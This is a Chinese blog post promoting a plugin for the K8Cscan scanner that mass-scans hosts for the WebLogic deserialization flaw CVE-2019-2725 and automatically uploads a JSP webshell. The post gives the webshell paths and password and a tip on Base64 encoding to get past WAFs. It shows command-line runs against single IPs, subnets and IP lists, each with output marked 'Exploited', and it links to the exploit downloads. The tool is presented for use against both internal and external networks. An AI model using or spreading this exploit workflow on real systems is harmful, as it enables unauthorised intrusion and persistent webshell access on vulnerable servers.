主程序:  K8Cscan 大型内网渗透自定义扫描器

https://www.cnblogs.com/k8gege/p/10519321.html

WeblogicScan插件

K8Cscan Moudle WeblogicScan & Exploit
目前仅支持漏洞编号 CNVD-C-2019-48814
该版本为探测weblogic漏洞并自动GetShell
外网可当成EXP使用,也可内网自动渗透用
无论内外网均可批量(填写ip或ip段列表即可)

(弄exp的时候还没CVE,所以回显写着CNVD,过了两天才有CVE-2019-2725,同一个漏洞不同叫法而已大家不要慌)

3.6支持URL和IP端口

用法:

K8cmdshell 向两个默认路径上传webshell 
使用飞刀cmd连接,经过Base64加密可过waf
传输CMD命令不加密,容易被WAF拦截或管理员发现 http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom
//http://192.168.1.106:7001/_async/shell.jsp tom
//http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom 指定IP(当成EXP用,填写内网或外网IP即可)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106
Cscan 3.5
By K8gege
load netscan.dll
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
Finished! 指定C段
C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24
Cscan 3.5
By K8gege
load netscan.dll Segment: 192.168.1.0
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.1
192.168.1.105
192.168.1.108
192.168.1.100
=============================================
onlinePC:5
Finished! 指定IP列表同目录下ip.txt(示例扫描3个IP)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe
Cscan 3.5
By K8gege
load netscan.dll
scan ip.txt (IP)
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.105
192.168.1.1
=============================================
onlinePC:3
Finished! 指定C段列表同目录下ipc.txt(示例扫描一个IP段)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe
Cscan 3.5
By K8gege
load netscan.dll
scan ipc.txt (IP/24) Segment: 192.168.1.0
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.1
192.168.1.105
192.168.1.108
=============================================
onlinePC:4
Finished!

3、下载

自动Getshell

https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20%26%20Exploit.rar

仅扫描漏洞

https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20Only%20Poc.rar

主程序

https://github.com/k8gege/K8CScan

[原创]K8Cscan插件之Weblogic漏洞扫描&通用GetShell Exploit的更多相关文章

  1. [原创]K8Cscan插件之Web主机扫描(存活主机、机器名、Banner、标题)

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  2. [原创]K8Cscan插件之存活主机扫描

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  3. [原创]K8Cscan插件之Cisco思科设备扫描(IP、设备型号、主机名、Boot、硬件版本)

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  4. [原创]K8Cscan插件之FTP弱口令扫描

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  5. [原创]K8Cscan插件之C段旁站扫描\子域名扫描

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  6. [原创]K8Cscan插件之端口扫描C#源码

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  7. [原创]K8Cscan插件之多种方式系统版本探测

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  8. [原创]K8Cscan插件之Windows密码爆破

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  9. [原创]K8Cscan插件之Mysql密码爆破

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

随机推荐

  1. java -相关技术

    地址:      http://www.codeyyy.com/java/11-35-52.html

  2. Code First的实体继承模式

    Entity Framework的Code First模式有三种实体继承模式 1.Table per Type (TPT)继承 2.Table per Class Hierarchy(TPH)继承 3 ...

  3. web安全系列4:google语法

    这是web安全的第四篇,欢迎翻看前面几篇. 前面我们介绍了一些和HTTP有关知识,那么一个疑问就是黑客要做的第一件是什么?其实很简单,确定一个目标,然后搜集信息. 这很容易理解,我们无论做什么都得先有 ...

  4. 2019.03.28 bzoj3326: [Scoi2013]数数(数位dp)

    传送门 题意: 一个人数数,规则如下: 确定数数的进制B 确定一个数数的区间[L, R] 对于[L, R] 间的每一个数,把该数视为一个字符串,列出该字符串的所有连续子串对应的B进制数的值. 对所有列 ...

  5. 无法获得锁 /var/lib/dpkg/lock - open

    关于 apt-get update 更新的时候出现 无法获得锁 /var/lib/dpkg/lock - open 解决 直接删除这个锁文件即可: sudo rm /var/lib/dpkg/lock ...

  6. MFC中添加控制台输出

    可以在CWinApp的InitInstance()中调用下面的函数,以生成控制台: #include <io.h> #include <fcntl.h> void InitCo ...

  7. CentOS 6下升级Python版本

    CentOS6.8默认的python版本是2.6,而现在好多python组件开始只支持2.7以上的版本,比如说我今天遇到的pip install pysqlite,升级python版本是一个痛苦但又常 ...

  8. enumerate的用法

    names = ["tony","huluwa","tom","jerry","lala"]for ...

  9. eclipse设置新建jsp文件默认字符编码为utf-8

    在使用Eclipse开发中,编码默认是ISO-8859-1,不支持中文.这样我们每次新建文件都要手动修改编码,非常麻烦.其实我们可以设置文件默认编码,今后再新建文件时就不用修改编码了. 1.打开Ecl ...

  10. Redis-07.Spring Data整合Jedis

    Spring整合Jedis 1.单实例(想节约时间的请直接拖到下面跳过1.2部分) step1:毫无疑问,首先需要在pom.xml中配置Jedis依赖 <dependency> <g ...